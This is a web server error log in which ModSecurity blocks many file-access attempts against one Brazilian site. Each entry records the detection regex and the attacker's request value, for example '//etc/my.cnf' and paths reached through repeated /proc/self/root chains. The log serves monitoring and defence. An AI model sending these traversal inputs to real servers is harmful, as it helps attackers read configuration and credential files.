[Fri Mar 20 11:21:45.805555 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.115:42814] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/system-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1X-V1pVZ5mVmJwsFNaqgAAAE0"]
[Fri Mar 20 11:22:05.335745 2026] [:error] [pid 21219:tid 140411632822016] [client 57.141.18.39:43448] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1YDfXLqtnMIWvjpaLG8wAAAo0"]
[Fri Mar 20 11:22:22.727493 2026] [:error] [pid 26799:tid 140411607643904] [client 57.141.18.69:43806] [client 57.141.18.69] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1YHta6ubjKNq_cu4YGAAAAA1A"]
[Fri Mar 20 11:22:25.353460 2026] [:error] [pid 7893:tid 140411658000128] [client 57.141.18.89:44034] [client 57.141.18.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sasl2"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1YIRCii7xarUs8iHaV7AAAAgo"]
[Fri Mar 20 11:22:29.747125 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.241.31:53190] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1YJda6ubjKNq_cu4YGBgAAA0I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:22:32.476389 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:33630] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1YKPqxLDW4GITHUkQWDwAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:22:35.724932 2026] [:error] [pid 7893:tid 140411616036608] [client 57.141.18.23:44306] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1YKxCii7xarUs8iHaV9AAAAg8"]
[Fri Mar 20 11:22:37.319618 2026] [:error] [pid 15826:tid 140411557287680] [client 74.7.241.31:33644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1YLeoXxyEfFpUF8f-r1gAAAVY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:22:43.551005 2026] [:error] [pid 31215:tid 140411716749056] [client 74.7.241.31:37710] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1YMwF0L0L-SsrnPo6UtwAAAsM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 11:22:50.647497 2026] [:error] [pid 7235:tid 140411565680384] [client 57.141.18.62:44718] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/throttle/superdreadnought012580787441.phtml"] [unique_id "ab1YOvqxLDW4GITHUkQWFAAAARU"]
[Fri Mar 20 11:22:52.948965 2026] [:error] [pid 9818:tid 140411632822016] [client 74.7.241.31:37720] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1YPF1pVZ5mVmJwsFNayQAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 11:22:55.871704 2026] [:error] [pid 11167:tid 140411599251200] [client 216.73.216.191:44742] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YP_HIg5MgXLBnicMhrgAAAdE"]
[Fri Mar 20 11:22:55.893450 2026] [:error] [pid 7893:tid 140411540502272] [client 216.73.216.191:44866] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YPxCii7xarUs8iHaWCAAAAhg"]
[Fri Mar 20 11:22:55.905244 2026] [:error] [pid 26799:tid 140411574073088] [client 216.73.216.191:44868] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YP9a6ubjKNq_cu4YGFAAAA1Q"]
[Fri Mar 20 11:22:56.248693 2026] [:error] [pid 26799:tid 140411741927168] [client 216.73.216.191:44884] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YQNa6ubjKNq_cu4YGFQAAA0A"]
[Fri Mar 20 11:22:56.395563 2026] [:error] [pid 21219:tid 140411674785536] [client 216.73.216.191:44892] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YQPXLqtnMIWvjpaLHBwAAAog"]
[Fri Mar 20 11:22:56.472200 2026] [:error] [pid 10189:tid 140411616036608] [client 216.73.216.191:44902] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YQDJ3M9BSuKP7CAZRxAAAAI8"]
[Fri Mar 20 11:22:56.711562 2026] [:error] [pid 11642:tid 140411632822016] [client 216.73.216.191:44920] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YQLninkcc-iUj5AqI7wAAA40"]
[Fri Mar 20 11:22:56.903868 2026] [:error] [pid 26799:tid 140411599251200] [client 216.73.216.191:44936] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YQNa6ubjKNq_cu4YGFgAAA1E"]
[Fri Mar 20 11:22:57.000913 2026] [:error] [pid 26799:tid 140411674785536] [client 216.73.216.191:44944] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YQNa6ubjKNq_cu4YGFwAAA0g"]
[Fri Mar 20 11:22:57.071509 2026] [:error] [pid 11167:tid 140411540502272] [client 216.73.216.191:44950] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YQfHIg5MgXLBnicMhsgAAAdg"]
[Fri Mar 20 11:22:57.545403 2026] [:error] [pid 7235:tid 140411725141760] [client 216.73.216.191:44928] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YQfqxLDW4GITHUkQWGAAAAQI"]
[Fri Mar 20 11:22:57.839208 2026] [:error] [pid 26799:tid 140411557287680] [client 216.73.216.191:44992] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YQda6ubjKNq_cu4YGGAAAA1Y"]
[Fri Mar 20 11:23:00.144443 2026] [:error] [pid 9818:tid 140411683178240] [client 216.73.216.191:45132] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YRF1pVZ5mVmJwsFNaywAAAEc"]
[Fri Mar 20 11:23:00.413183 2026] [:error] [pid 31215:tid 140411632822016] [client 216.73.216.191:45096] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YRAF0L0L-SsrnPo6UxwAAAs0"]
[Fri Mar 20 11:23:04.923783 2026] [:error] [pid 21219:tid 140411725141760] [client 216.73.216.191:45428] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1YSPXLqtnMIWvjpaLHDgAAAoI"]
[Fri Mar 20 11:23:07.029784 2026] [mime_magic:error] [pid 11167:tid 140411683178240] (70014)End of file found: [client 57.141.18.64:45510] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 11:23:24.268231 2026] [:error] [pid 11167:tid 140411540502272] [client 57.141.18.67:46192] [client 57.141.18.67] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc1.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/cassetete/roughage01438383918.phtml"] [unique_id "ab1YXPHIg5MgXLBnicMhygAAAdg"]
[Fri Mar 20 11:23:43.035527 2026] [:error] [pid 21219:tid 140411725141760] [client 216.73.216.191:46858] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/b"] [unique_id "ab1Yb_XLqtnMIWvjpaLHJwAAAoI"]
